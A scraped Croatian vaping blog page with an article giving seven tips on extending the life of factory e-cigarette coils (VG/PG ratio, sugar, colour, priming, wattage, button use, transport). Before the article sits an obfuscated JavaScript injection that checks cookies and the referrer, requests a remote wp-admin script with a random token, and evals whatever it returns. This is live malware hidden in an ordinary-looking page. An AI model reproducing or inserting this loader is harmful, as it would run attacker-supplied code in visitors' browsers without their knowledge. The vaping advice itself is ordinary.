;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Grijač za e cigaretu

Grijači za e cigaretu

Savjeti za korištenje tvorničkih grijača za e cigaretu.

Uvod

Kvalitetna i permanentna komunikacija sa našim korisnicima je ono na što smo kao cijeli Journey team vrlo ponosni, i kroz nju dobivamo ideje za nove proizvode i konstantno savjetujemo kako konzumaciju naših proizvoda, e-tekućina i e-cigareta učiniti još boljom i jednostavnijom.

Većina korisnika e-cigareta, i kod nas i u svijetu koristi gotove, tvorničke grijače. Što zbog jednostavnosti upotrebe, praktičnosti itd.

U ovom članku ću se probati osvrnuti na najčešća pitanja koja dobivam od Vas gotovo svakodnevno, vezanim za tvorničke grijače, a naravno, uvijek nam se možete obratiti za još individualnog savjetovanja!

1. Tvornički grijači za e cigaretu & omjer VG/PG

Odmah disclamer, to što Vama paše veći ili manji VPG omjer nije predmet ovog članka nego ono što paše grijaču!

VG je gust i brže prlja grijač! Većina tvorničkih grijača će podnositi omjer 70 VG 30 PG na sobnoj temperaturi ili na ljetnoj vrućini kad je viskozitet e-tekućine manji. Većina ali ne svi i ne na hladnom. Jedan od “trikova” koji korisnici koriste je bušenje vate tankom šivaćom iglom da bi se postiglo bolje napajanje vate, ali to koristite na vlastitu odgovornost. U svakom slučaju više VG-a će brže zaprljati Vaš grijač i smanjiti mu vrijeme trajanja!

Za bezbrižno korištenje gotovih tvorničkih grijača koristite tekućine omjera 50 50 VPG!

2. Tvornički grijači za e cigaretu i šećer u e-tekućini

Što je tekućina slađa, brže prlja grijač! Ako Vam je cilj uštedjeti na izdatcima za tvorničke grijače a ne želite ili ne možete sami raditi grijače, ne koristite preslatke e-tekućine. Šećer iz e-tekućine će se vrlo brzo u sagorenom obliku nataložiti na žici unutar samog grijača što će promjeniti i vrijeme zagrijavanja, zaprljati vatu i početi tamniti e-tekućinu u tanku u relativno kratkom roku. Ako ipak volite slatko toliko da Vam ne smeta češća zamjena grijača, sve je u redu.

3. Tvornički grijači za e cigaretu i boja e-tekućine

Boja e-tekućine može značiti da je dodana boja (crvena, plava) ili da je aroma sama po sebi tamnije boje. Što je tekućina tamnija, brže će prljati vatu u grijaču a samim tim i grijač taloženjem nesagorjele boje u potpunosti oko žice unutar grijača. Brzina tog taloženja i prljanja nije ni blizu kao kao količine šećera u e-tekućini ali je ipak prisutna kao jedan od čimbenika dugovječnosti tvorničkog grijača. Za duži vijek trajanja grijača koristite tekućine svijetlije boje!

4. Tvornički grijači i instalacija u uređaj

Pod ovim prvenstveno mislim na pravilno “prajmanje” grijača. Dakle kapanje e tekućine u otvore grijača da bi se natopila vata prije prve upotrebe grijača. Ne štedite na tekućini, i nakapajte da se vata dobro natopi. Ako pretjerate, uvijek jednostavno možete otresti višak e-tekućine iz grijača. Ako pak želite čiste ruke, nakapajte racionalno možda i manje nego treba, ali OBAVEZNO prije prvog korištenja ostavite uređaj sa napunjenim tankom da odstoji 30 do 45 min da se vata stigne u potpunosti natopiti sa e-tekućinom iz tanka.

5. Tvornički grijači i snaga struje i električne energije

Ne dajte se zbuniti sa sljedeće dvije rečenice. Prolaskom kroz materijale električna struja ispoljava toplinski učinak, odnosno zagrijava materijal kroz koji prolazi. Isto tako, ona može ispoljavati i magnetski, kemijski ili mehanički učinak. Taj će učinak biti to jači, što je veći umnožak jakosti struje i napona koji je tu struju protjerao kroz strujni krug. Taj se umnožak stoga zove snaga ili električni učinak električne struje. Veličinski se snaga izražava u Vatima, a bilježi se s W (James Watt).

Znači ne pretjerujte sa Watt-ima, na uređajima na kojima su oni podesivi. Ako imate aio (all in one) uređaj, ovu točku 5. ne morate ni čitati. Namjenjena je onima koji svoj tank sa tvorničkim grijačima koriste na modu sa podesivim watima pa ponekad pretjeraju. Uvijek koristite tvornički grijač u rasponu Watta propisanih od proizvođača grijača. I to u donjem spektru propisanih vrijednosti za duži vijek trajanja grijača!

6. Tvornički grijači i “težak prst”

Dozvolite da odmah objasnim; većina Vas zna šta znači kad se kaže da netko ima tešku nogu na gasu automobila. Isto je i sa palcem ili kažiprstom koji koristite za vašu power tipku na uređaju ako je imate. Ako koristite uređaj koji se aktivira protokom/povlačenjem zraka kroz uređaj i ovu točku 6. možete preskočiti. Da bi grijač trajao iole neko racionalno vrijeme, izuzetno je bitno da ne pritišćete power tipku dok zrak ne ide po žici grijača i ne hladi je. Znači prvo početi uvlačiti zrak, pa pritisnuti tipku pa prije nego prestajete sa uvlačenjem zraka pustiti tipku i tek onda prestati uvlačiti zrak.

Po osobnim iskustvima, ovo je jedna od najvećih početničkih grešaka kod novih korisnika i razlog zašto im grijači traju samo dan ili dva!

7. Tvornički grijači i transport uređaja

Evo čisto kad sam sve nabrojao da spomenem i ovo; gasite Vaš uređaj kad ga ne koristite! Ako Vaš uređaj nema tipku za gašenje, možete preskočiti i ovu 7. točku članka. Svi koji stavljaju upaljen uređaj u džep, torbicu, ili bilo gdje drugdje gdje može doći do slučajnog pritiska na power tipku i aktivaciju uređaja riskiraju pregaranje grijača i pražnjenje baterije! I sa cut off funkcijom, ovo nikako nije preporučljivo!

Ž.M.

Choose your Reaction!
  • Do sada nigdje nisam o ovoj temi našao sve ovako dobro, kratko i jasno objašnjeno. Odličan tekst, ty!

Leave a Comment